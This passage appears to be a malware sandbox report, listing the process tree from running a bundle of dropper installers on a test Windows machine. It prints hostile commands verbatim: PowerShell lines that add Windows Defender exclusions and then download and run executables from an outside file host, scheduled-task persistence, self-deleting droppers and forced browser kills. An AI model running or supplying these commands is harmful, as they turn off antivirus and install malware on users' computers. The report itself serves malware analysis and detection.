    PID:2656
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    PID:2640
- C:\Users\Admin\Documents\ZacL18ohdKBx4lz8LjtZSN5o.exe
  "C:\Users\Admin\Documents\ZacL18ohdKBx4lz8LjtZSN5o.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2304
- C:\Users\Admin\Documents\gKbsiZTKkwoxwpY6ALmIW9nu.exe
  "C:\Users\Admin\Documents\gKbsiZTKkwoxwpY6ALmIW9nu.exe"
  2⤵
  - Executes dropped EXE
  PID:2284
- C:\Users\Admin\Documents\PfbJ32NdSSR4m9dv3xK9bqYM.exe
  "C:\Users\Admin\Documents\PfbJ32NdSSR4m9dv3xK9bqYM.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2436

C:\Users\Admin\AppData\Local\Temp\is-30CN6.tmp\PfbJ32NdSSR4m9dv3xK9bqYM.tmp
"C:\Users\Admin\AppData\Local\Temp\is-30CN6.tmp\PfbJ32NdSSR4m9dv3xK9bqYM.tmp" /SL5="$101C6,138429,56832,C:\Users\Admin\Documents\PfbJ32NdSSR4m9dv3xK9bqYM.exe"
1⤵
- Executes dropped EXE
PID:2548
- C:\Users\Admin\AppData\Local\Temp\is-R16DN.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-R16DN.tmp\Setup.exe" /Verysilent
  2⤵
  PID:1948
- - C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
    "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
    3⤵
    PID:2052
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 900
      4⤵
      Program crash
      PID:3516
- - C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
    3⤵
    PID:1944
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282273 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
      4⤵
      PID:4864
- - C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
    "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
    3⤵
    PID:2700
  - - C:\Users\Admin\AppData\Local\Temp\is-P3HRJ.tmp\WEATHER Manager.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-P3HRJ.tmp\WEATHER Manager.tmp" /SL5="$204B0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
      4⤵
      PID:3536
    - - C:\Users\Admin\AppData\Local\Temp\is-04R8H.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-04R8H.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
        5⤵
        
        PID:1856
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-04R8H.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-04R8H.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282273 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
        6⤵
        
        PID:2588
- - C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
    "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
    3⤵
    PID:2084
  - - C:\Users\Admin\AppData\Local\Temp\is-4K1GA.tmp\VPN.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-4K1GA.tmp\VPN.tmp" /SL5="$201C8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
      4⤵
      PID:1532
- - C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
    "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
    3⤵
    PID:1340
  - - C:\Users\Admin\AppData\Local\Temp\is-89EOC.tmp\Inlog.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-89EOC.tmp\Inlog.tmp" /SL5="$201A6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
      4⤵
      PID:2656
- - C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
    "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
    3⤵
    PID:576
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im chrome.exe
      4⤵
      PID:2456
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        5⤵
        Kills process with taskkill
        
        PID:2180
- - C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
    "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
    3⤵
    PID:1064
- - C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
    "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
    3⤵
    PID:2692
  - - C:\Users\Admin\AppData\Local\Temp\is-IUDJT.tmp\MediaBurner2.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-IUDJT.tmp\MediaBurner2.tmp" /SL5="$301BE,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
      4⤵
      PID:2412
    - - C:\Users\Admin\AppData\Local\Temp\is-MJVLQ.tmp\3377047_logo_media.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-MJVLQ.tmp\3377047_logo_media.exe" /S /UID=burnerch2
        5⤵
        
        PID:3576
      - C:\Program Files\Google\SGCTNRQBCR\ultramediaburner.exe
        
        "C:\Program Files\Google\SGCTNRQBCR\ultramediaburner.exe" /VERYSILENT
        6⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\is-5T389.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5T389.tmp\ultramediaburner.tmp" /SL5="$2032E,281924,62464,C:\Program Files\Google\SGCTNRQBCR\ultramediaburner.exe" /VERYSILENT
        7⤵
        
        PID:560
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        8⤵
        
        PID:3572
      - C:\Users\Admin\AppData\Local\Temp\ac-822d1-a76-e2b8b-a0abb6bd3d06d\Tuwezhibaesho.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ac-822d1-a76-e2b8b-a0abb6bd3d06d\Tuwezhibaesho.exe"
        6⤵
        
        PID:5028
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        7⤵
        
        PID:2076
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2076 CREDAT:275457 /prefetch:2
        8⤵
        
        PID:4676
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 2520
        9⤵
        Program crash
        
        PID:2636
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2076 CREDAT:340994 /prefetch:2
        8⤵
        
        PID:2432
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2076 CREDAT:865287 /prefetch:2
        8⤵
        
        PID:1740
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2076 CREDAT:275482 /prefetch:2
        8⤵
        
        PID:4988
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
        7⤵
        
        PID:3136
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3136 CREDAT:275457 /prefetch:2
        8⤵
        
        PID:3032
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
        7⤵
        
        PID:1488
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1488 CREDAT:275457 /prefetch:2
        8⤵
        
        PID:3068
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
        7⤵
        
        PID:3104
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3104 CREDAT:275457 /prefetch:2
        8⤵
        
        PID:2536
      - C:\Users\Admin\AppData\Local\Temp\1c-4e1db-f51-c2a87-d979699ca7609\Laemalylyqa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1c-4e1db-f51-c2a87-d979699ca7609\Laemalylyqa.exe"
        6⤵
        
        PID:4292
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\41wqj2td.rjx\GcleanerEU.exe /eufive & exit
        7⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\41wqj2td.rjx\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\41wqj2td.rjx\GcleanerEU.exe /eufive
        8⤵
        
        PID:956
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\41wqj2td.rjx\GcleanerEU.exe" & exit
        9⤵
        
        PID:1764
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "GcleanerEU.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:112
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hhext5ky.bx3\installer.exe /qn CAMPAIGN="654" & exit
        7⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\hhext5ky.bx3\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\hhext5ky.bx3\installer.exe /qn CAMPAIGN="654"
        8⤵
        
        PID:3768
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\hhext5ky.bx3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\hhext5ky.bx3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282273 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        9⤵
        
        PID:1764
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dgk5vw0v.sga\ufgaa.exe & exit
        7⤵
        
        PID:1604
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wkmrilax.ulh\anyname.exe & exit
        7⤵
        
        PID:832
        
        C:\Users\Admin\AppData\Local\Temp\wkmrilax.ulh\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\wkmrilax.ulh\anyname.exe
        8⤵
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\wkmrilax.ulh\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wkmrilax.ulh\anyname.exe" -q
        9⤵
        
        PID:2220
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m4r0t0cm.x02\gcleaner.exe /mixfive & exit
        7⤵
        
        PID:4312
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wu0h3uuj.ytv\autosubplayer.exe /S & exit
        7⤵
        
        PID:4236
- - C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
    "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
    3⤵
    PID:2588
  - - C:\Users\Admin\AppData\Roaming\8805716.exe
      "C:\Users\Admin\AppData\Roaming\8805716.exe"
      4⤵
      PID:3708
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3708 -s 1580
        5⤵
        Program crash
        
        PID:4848
  - - C:\Users\Admin\AppData\Roaming\8823251.exe
      "C:\Users\Admin\AppData\Roaming\8823251.exe"
      4⤵
      PID:3884
  - - C:\Users\Admin\AppData\Roaming\3765239.exe
      "C:\Users\Admin\AppData\Roaming\3765239.exe"
      4⤵
      PID:1528
  - - C:\Users\Admin\AppData\Roaming\3748474.exe
      "C:\Users\Admin\AppData\Roaming\3748474.exe"
      4⤵
      PID:3968
- - C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
    3⤵
    PID:1116
  - - C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
      4⤵
      PID:1552
- - C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
    "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
    3⤵
    PID:1336
  - - C:\Users\Admin\AppData\Local\Temp\tmp81C_tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp81C_tmp.exe"
      4⤵
      PID:4772
    - - C:\Windows\SysWOW64\dllhost.exe
        
        "C:\Windows\System32\dllhost.exe"
        5⤵
        
        PID:1740
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
        5⤵
        
        PID:5012
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd
        6⤵
        
        PID:4192
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
        7⤵
        
        PID:2460
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping MRBKYMNO -n 30
        7⤵
        Runs ping.exe
        
        PID:4636
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        Esplorarne.exe.com i
        7⤵
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        8⤵
        
        PID:4452
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        9⤵
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        10⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        11⤵
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        12⤵
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        13⤵
        
        PID:2188
- - C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
    "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
    3⤵
    PID:1780
  - - C:\Users\Admin\Documents\N24ehnQk0wCt5mXkVwOizOYe.exe
      "C:\Users\Admin\Documents\N24ehnQk0wCt5mXkVwOizOYe.exe"
      4⤵
      PID:3344
    - - C:\Users\Admin\Documents\N24ehnQk0wCt5mXkVwOizOYe.exe
        
        C:\Users\Admin\Documents\N24ehnQk0wCt5mXkVwOizOYe.exe
        5⤵
        
        PID:2592
  - - C:\Users\Admin\Documents\LNtMEj88a2Pxmw470UvSQXJS.exe
      "C:\Users\Admin\Documents\LNtMEj88a2Pxmw470UvSQXJS.exe"
      4⤵
      PID:3336
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
        5⤵
        
        PID:3140
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        6⤵
        
        PID:1368
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        6⤵
        
        PID:2020
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        6⤵
        
        PID:4756
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        6⤵
        
        PID:3328
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
        6⤵
        
        PID:884
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
        6⤵
        
        PID:396
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
        6⤵
        
        PID:2680
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
        6⤵
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        7⤵
        
        PID:4908
        
        C:\Windows\system32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        8⤵
        
        PID:3724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        9⤵
        
        PID:2252
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        8⤵
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\svchost32.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        9⤵
        
        PID:3220
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
        10⤵
        
        PID:984
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
        11⤵
        Creates scheduled task(s)
        
        PID:316
        
        C:\Windows\system32\services32.exe
        
        "C:\Windows\system32\services32.exe"
        10⤵
        
        PID:4792
        
        C:\Windows\system32\cmd.exe
        
        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        11⤵
        
        PID:1696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        12⤵
        
        PID:396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        12⤵
        
        PID:4104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
        12⤵
        
        PID:2136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        12⤵
        
        PID:2516
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
        11⤵
        
        PID:3144
        
        C:\Users\Admin\AppData\Local\Temp\svchost32.exe
        
        C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
        12⤵
        
        PID:2920
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
        13⤵
        
        PID:2256
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
        14⤵
        Creates scheduled task(s)
        
        PID:2704
        
        C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
        
        "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
        13⤵
        
        PID:3988
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
        13⤵
        
        PID:2444
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        14⤵
        
        PID:2844
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
        10⤵
        
        PID:4552
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        11⤵
        
        PID:2112
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
        6⤵
        
        PID:4576
        
        C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
        7⤵
        
        PID:3344
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
        6⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\launcher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
        7⤵
        
        PID:3940
  - - C:\Users\Admin\Documents\AY0vH2ruGXA9y4CZVrVsIQf4.exe
      "C:\Users\Admin\Documents\AY0vH2ruGXA9y4CZVrVsIQf4.exe"
      4⤵
      PID:3256
    - - C:\Users\Admin\Documents\AY0vH2ruGXA9y4CZVrVsIQf4.exe
        
        C:\Users\Admin\Documents\AY0vH2ruGXA9y4CZVrVsIQf4.exe
        5⤵
        
        PID:2324
  - - C:\Users\Admin\Documents\0bnxIzJsRODgvHiZ2_kqY1B9.exe
      "C:\Users\Admin\Documents\0bnxIzJsRODgvHiZ2_kqY1B9.exe"
      4⤵
      PID:3320
  - - C:\Users\Admin\Documents\xU59Np5Z9LVXXgGrdSQeLtsE.exe
      "C:\Users\Admin\Documents\xU59Np5Z9LVXXgGrdSQeLtsE.exe"
      4⤵
      PID:3312
  - - C:\Users\Admin\Documents\0Bu_2LZYzKxEB7M8oDk53iVt.exe
      "C:\Users\Admin\Documents\0Bu_2LZYzKxEB7M8oDk53iVt.exe"
      4⤵
      PID:3276
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 888
        5⤵
        Program crash
        
        PID:4644
  - - C:\Users\Admin\Documents\4CtI03TAkJjMxW5D1QQvGEOE.exe
      "C:\Users\Admin\Documents\4CtI03TAkJjMxW5D1QQvGEOE.exe"
      4⤵
      PID:2424
  - - C:\Users\Admin\Documents\MX4iAq9QwYMIyoqtZ_0Kle2T.exe
      "C:\Users\Admin\Documents\MX4iAq9QwYMIyoqtZ_0Kle2T.exe"
      4⤵
      PID:3208
    - - C:\Users\Admin\Documents\MX4iAq9QwYMIyoqtZ_0Kle2T.exe
        
        C:\Users\Admin\Documents\MX4iAq9QwYMIyoqtZ_0Kle2T.exe
        5⤵
        
        PID:3088
  - - C:\Users\Admin\Documents\zISiXHLFZPScxGMg3aKLSsKe.exe
      "C:\Users\Admin\Documents\zISiXHLFZPScxGMg3aKLSsKe.exe"
      4⤵
      PID:3180
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "zISiXHLFZPScxGMg3aKLSsKe.exe" /f & erase "C:\Users\Admin\Documents\zISiXHLFZPScxGMg3aKLSsKe.exe" & exit
        5⤵
        
        PID:3872
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "zISiXHLFZPScxGMg3aKLSsKe.exe" /f
        6⤵
        Kills process with taskkill
        
        PID:3752
  - - C:\Users\Admin\Documents\RkrmnSDlO4JTAdwDL171Jyu4.exe
      "C:\Users\Admin\Documents\RkrmnSDlO4JTAdwDL171Jyu4.exe"
      4⤵
      PID:3168
    - - C:\Users\Admin\Documents\RkrmnSDlO4JTAdwDL171Jyu4.exe
        
        C:\Users\Admin\Documents\RkrmnSDlO4JTAdwDL171Jyu4.exe
        5⤵
        
        PID:3184
  - - C:\Users\Admin\Documents\pgJLRh3PNtckW5YvEjt1FDuN.exe
      "C:\Users\Admin\Documents\pgJLRh3PNtckW5YvEjt1FDuN.exe"
      4⤵
      PID:3128
  - - C:\Users\Admin\Documents\f5mW8zqEG58ETIHE5RePsHHi.exe
      "C:\Users\Admin\Documents\f5mW8zqEG58ETIHE5RePsHHi.exe"
      4⤵
      PID:3808
  - - C:\Users\Admin\Documents\MV5igun7lJ8T9zr8hVoFNyHQ.exe
      "C:\Users\Admin\Documents\MV5igun7lJ8T9zr8hVoFNyHQ.exe"
      4⤵
      PID:3896
  - - C:\Users\Admin\Documents\6OmnPeVXObnCHcsp7bBqv6Th.exe
      "C:\Users\Admin\Documents\6OmnPeVXObnCHcsp7bBqv6Th.exe"
      4⤵
      PID:4076
  - - C:\Users\Admin\Documents\rMeUZR9j8oQOGyDqBFGf0fVX.exe
      "C:\Users\Admin\Documents\rMeUZR9j8oQOGyDqBFGf0fVX.exe"
      4⤵
